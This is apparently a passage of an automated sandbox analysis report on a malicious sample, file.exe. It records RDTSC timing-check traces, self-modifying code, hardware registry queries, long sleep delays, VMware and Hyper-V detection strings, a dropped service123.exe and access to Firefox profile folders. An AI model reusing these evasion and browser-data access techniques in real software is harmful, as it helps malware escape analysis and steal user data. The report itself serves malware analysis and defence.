0x0000004e push edx 0x0000004f jmp 00007FC85D338E2Ch 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0493 second address: 73F04A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC85CDF02AFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F04A7 second address: 73F052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov esi, 3B1D9CD1h 0x0000000e mov eax, 6F0E350Dh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC85D338E39h 0x0000001c sub esi, 5B7AF496h 0x00000022 jmp 00007FC85D338E31h 0x00000027 popfd 0x00000028 jmp 00007FC85D338E30h 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov bx, ax 0x00000033 pushfd 0x00000034 jmp 00007FC85D338E2Ah 0x00000039 add cx, CBE8h 0x0000003e jmp 00007FC85D338E2Bh 0x00000043 popfd 0x00000044 popad 0x00000045 mov ebp, esp 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F052A second address: 73F0545 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0545 second address: 73F054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F054B second address: 73F054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09D1 second address: 73B09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09D5 second address: 73B09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09DB second address: 73B09E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09E1 second address: 73B09E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7370063 second address: 7370068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7370068 second address: 73700AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02B2h 0x00000012 xor esi, 3F906148h 0x00000018 jmp 00007FC85CDF02ABh 0x0000001d popfd 0x0000001e mov ah, F0h 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC85CDF02ADh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73700AE second address: 73700C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73700C3 second address: 73700C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737063E second address: 73706C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E2Ah 0x00000009 adc ecx, 038F0048h 0x0000000f jmp 00007FC85D338E2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FC85D338E36h 0x0000001e push eax 0x0000001f jmp 00007FC85D338E2Bh 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 jmp 00007FC85D338E34h 0x0000002b pushfd 0x0000002c jmp 00007FC85D338E32h 0x00000031 or al, 00000038h 0x00000034 jmp 00007FC85D338E2Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 movzx eax, bx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73706C5 second address: 73706EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, eax 0x0000000b popad 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73706EA second address: 73706EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73706EE second address: 73706F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0907 second address: 73B090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B090B second address: 73B090F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B090F second address: 73B0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0915 second address: 73B091B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B091B second address: 73B091F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B091F second address: 73B0936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, 0E1BA6CCh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0936 second address: 73B0952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0952 second address: 73B0987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FC85CDF02B4h 0x00000011 mov eax, 7B24DB51h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov dh, 63h 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00C2 second address: 73A00D9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2D8404ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00D9 second address: 73A00DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00DD second address: 73A00F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00F0 second address: 73A00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00F6 second address: 73A00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00FA second address: 73A01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02B9h 0x00000013 sub ah, FFFFFFC6h 0x00000016 jmp 00007FC85CDF02B1h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC85CDF02ACh 0x00000025 adc ah, 00000068h 0x00000028 jmp 00007FC85CDF02ABh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FC85CDF02B8h 0x00000034 add al, FFFFFFC8h 0x00000037 jmp 00007FC85CDF02ABh 0x0000003c popfd 0x0000003d popad 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 mov cl, 77h 0x00000042 mov ch, bl 0x00000044 popad 0x00000045 push eax 0x00000046 jmp 00007FC85CDF02B3h 0x0000004b xchg eax, esi 0x0000004c jmp 00007FC85CDF02B6h 0x00000051 xchg eax, edi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 movsx ebx, ax 0x00000058 pushfd 0x00000059 jmp 00007FC85CDF02B6h 0x0000005e adc ax, 27E8h 0x00000063 jmp 00007FC85CDF02ABh 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A01E0 second address: 73A01E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A01E5 second address: 73A0231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC85CDF02B0h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FC85CDF02B0h 0x00000015 mov edi, dword ptr [ebp+08h] 0x00000018 jmp 00007FC85CDF02B0h 0x0000001d mov dword ptr [esp+24h], 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0231 second address: 73A0235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0235 second address: 73A023B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A023B second address: 73A0266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC85D338E2Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0266 second address: 73A026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A026C second address: 73A02BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E38h 0x00000009 jmp 00007FC85D338E35h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FC8CD2EAFB8h 0x00000018 jmp 00007FC85D338E2Eh 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A02BC second address: 73A02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A02D9 second address: 73A02F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC85D338E30h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A02F6 second address: 73A0333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D364h 0x00000007 movsx edx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e jmp 00007FC85CDF02B4h 0x00000013 mov esp, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC85CDF02B7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0333 second address: 73A0338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0A7E second address: 73B0AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 17BD2956h 0x00000008 pushfd 0x00000009 jmp 00007FC85CDF02B7h 0x0000000e add cx, 1DDEh 0x00000013 jmp 00007FC85CDF02B9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FC85CDF02AAh 0x00000026 add ax, 35D8h 0x0000002b jmp 00007FC85CDF02ABh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0AE0 second address: 73B0B27 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FC85D338E31h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC85D338E36h 0x00000018 sub si, 7A98h 0x0000001d jmp 00007FC85D338E2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0B27 second address: 73B0B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85CDF02AFh 0x00000009 adc ecx, 7FE4535Eh 0x0000000f jmp 00007FC85CDF02B9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0855 second address: 73B087A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC85D338E2Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B087A second address: 73B0880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0880 second address: 73B0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D18 second address: 73B0D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC85CDF02B3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D33 second address: 73B0D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D39 second address: 73B0D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D3D second address: 73B0D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D41 second address: 73B0D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC85CDF02AEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D5F second address: 73B0D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D63 second address: 73B0D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74003DD second address: 74003ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85D338E2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74003ED second address: 74003FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74003FC second address: 7400402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400402 second address: 7400452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02AEh 0x00000013 or ecx, 21D42788h 0x00000019 jmp 00007FC85CDF02ABh 0x0000001e popfd 0x0000001f mov ah, 43h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007FC85CDF02ACh 0x0000002c pop eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400452 second address: 7400457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400457 second address: 7400474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 00EDCC83h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dl, byte ptr [ebp+14h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC85CDF02ABh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400474 second address: 740048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp+10h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cl, E0h 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E74FC4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E748D7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E74822 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 101E480 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10A8DCA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2407
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2300
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.0 %
Source: C:\Users\user\Desktop\file.exe TID: 4576 Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4576 Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 3564 Thread sleep count: 57 > 30
Source: C:\Users\user\Desktop\file.exe TID: 3564 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 3784 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5500 Thread sleep count: 2407 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5500 Thread sleep time: -4816407s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4904 Thread sleep count: 2300 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4904 Thread sleep time: -4602300s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6720 Thread sleep count: 57 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6720 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2792 Thread sleep count: 52 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2792 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4544 Thread sleep count: 249 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: chrome.exe, 00000003.00000002.2495972219.000001F0FDF0B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
